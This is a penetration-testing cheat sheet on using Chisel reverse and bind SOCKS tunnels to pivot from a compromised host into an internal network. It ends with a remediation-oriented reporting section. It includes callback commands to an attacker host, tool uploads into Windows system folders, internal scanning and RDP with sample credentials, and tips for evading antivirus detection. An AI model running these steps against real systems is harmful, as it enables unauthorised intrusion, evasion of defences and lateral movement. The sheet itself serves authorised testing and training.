🛡️ Methodology Checklist
- Download Chisel Linux + Windows binaries to attacker
- Start Chisel server on attacker: `./chisel server --reverse`
- Upload Windows binary to pivot via SMB, HTTP, or NXC
- Pivot connects back: `chisel client [LHOST]:8080 R:socks`
- Verify SOCKS listener on attacker: `netstat -lnpt | grep 1080`
- Configure Proxychains: `socks5 127.0.0.1 1080`
- Attack internal targets: `proxychains4 -q nxc smb [INTERNAL] ...`
- Cleanup: `Stop-Process -Name chisel -Force` on pivot, Ctrl+C on attacker
🎯 Operational Context
Use when: Windows pivot host with no SSH — use Chisel reverse SOCKS proxy for tunneling.
Think Dumber First: Attacker: ./chisel server --reverse. Target: chisel client [LHOST]:8080 R:socks. Done — SOCKS5 proxy on attacker port 1080. Route all traffic via proxychains4 -q [TOOL].
Skip when: Linux pivot with SSH available — SSH dynamic proxy is faster to set up and requires no binary transfer.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `go build -ldflags "-s -w" .` | Build chisel (same architecture as the attack host) |
| `env GOOS=linux GOARCH=amd64 go build -o chisel-x64 -ldflags "-s -w" .` | Cross-compile chisel for Linux AMD64 |
| `scp chisel-x64 [USER]@[PIVOT_IP]:~/chisel` | Transfer chisel to pivot host |
| `./chisel server -v -p [LISTEN_PORT] --socks5` | Bind mode: start server on pivot host (pivot listens) |
| `./chisel client -v [PIVOT_IP]:[LISTEN_PORT] socks` | Bind mode: connect from attack host to pivot server |
| `sudo ./chisel server --reverse -v -p [LISTEN_PORT] --socks5` | Reverse mode: start server on attack host |
| `./chisel client -v [LHOST]:[LISTEN_PORT] R:socks` | Reverse mode: pivot connects back to attack host |
| `proxychains nmap -sT -Pn -p 445,139,80 [TARGET_IP]` | Scan internal host through Chisel SOCKS tunnel |
| `proxychains xfreerdp3 /v:[TARGET_IP] /u:[USER] /p:[PASS] /dynamic-resolution +clipboard` | RDP to internal host through Chisel tunnel |
🔬 Deep Dive & Workflow
Why Chisel
Chisel carries TCP (and optionally UDP) tunnels over a single HTTP WebSocket connection that is encrypted and authenticated with SSH. It works when outbound HTTP/HTTPS egress is allowed but direct SSH to the pivot is blocked, and it can expose a SOCKS5 proxy on either end of the tunnel. SOCKS5 adds UDP association, authentication and hostname-based targets over SOCKS4; note, however, that proxychains only relays TCP connections, so in the workflow below the tunnel carries TCP traffic regardless of SOCKS version.
Building Chisel
Cross-compile to avoid an architecture mismatch on the pivot (`Exec format error`):

```bash
# On attack host (ARM/any)
env GOOS=linux GOARCH=amd64 go build -o chisel-x64 -ldflags "-s -w" .   # for Linux AMD64 pivot
go build -o chisel-local .                                             # for the local attack host
scp chisel-x64 ubuntu@10.129.202.64:~/chisel
```

Method 1: Bind Pivot (Victim Listens)
Use when the pivot host has no firewall blocking inbound on the chosen port:

```bash
# On pivot host (victim)
./chisel server -v -p 1234 --socks5
# On attack host
./chisel client -v 10.129.202.64:1234 socks
# Opens a SOCKS5 listener on local port 1080
```

Method 2: Reverse Pivot (Firewall Bypass)
Use when inbound connections to the pivot are blocked — the pivot calls home instead:

```bash
# On attack host (start first)
sudo ./chisel server --reverse -v -p 1234 --socks5
# On pivot host
./chisel client -v 10.10.14.18:1234 R:socks
# R:socks = create a reverse SOCKS tunnel
```

When the client connects you will see on the attack host: `tun: proxy#127.0.0.1:1080=>socks: Listening`
Configure proxychains

```bash
sudo nano /etc/proxychains4.conf
# Comment out the existing socks4 line, then add:
socks5 127.0.0.1 1080
```

Using the Tunnel

```bash
# RDP over TCP/3389 (proxychains relays TCP only; RDP's optional UDP transport is simply not used)
proxychains xfreerdp3 /v:172.16.5.19 /u:victor /p:pass@123 /dynamic-resolution +clipboard
# Nmap: -sT (full TCP connect) and -Pn (skip host discovery) are mandatory,
# because raw SYN packets and ICMP probes cannot traverse a SOCKS proxy
proxychains nmap -sT -Pn -p 445,139,80 172.16.5.19
```

🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Chisel client not connecting | Egress filtering blocks the pivot's outbound TCP/8080 (Chisel's default server port) | Run the server on a commonly permitted port, e.g. `chisel server --reverse -p 443`, and point the client at `[LHOST]:443` |
| AV detecting chisel.exe | Default signature | Rename binary; compile from source with different strings; or use SCP/SFTP to deliver as a legitimate filename |
| Proxychains not using Chisel tunnel | Wrong port or proxy type in proxychains.conf | Chisel's reverse SOCKS listener defaults to 127.0.0.1:1080; set `socks5 127.0.0.1 1080` and comment out the default socks4 line |
| Chisel disconnects frequently | Keepalive not set | Add `--keepalive 30s` to both the server and client commands |
| Cannot upload chisel to target | No write permission | Try `%TEMP%`, `C:\Windows\Tasks\`, `C:\ProgramData\`; deliver over SMB with `nxc smb [PIVOT] -u [USER] -p [PASS] --put-file chisel.exe \\Windows\\Tasks\\chisel.exe` |
📝 Reporting Trigger
Finding Title: Chisel Reverse SOCKS Proxy Enables Internal Network Pivoting via Windows Host
Impact: A Chisel proxy through a compromised Windows host gives an attacker in an external position unrestricted reachability to internal network resources, bypassing network segmentation through an SSH-encrypted tunnel carried over HTTP.
Root Cause: No monitoring of unusual outbound HTTP connections from Windows workloads; no egress filtering preventing server workloads from establishing outbound HTTPS connections.
Recommendation: Route all server-workload egress through an outbound HTTP/HTTPS proxy with URL categorization; alert on CONNECT-method proxy usage from non-browser processes; deploy host-based firewalls limiting inter-segment reachability.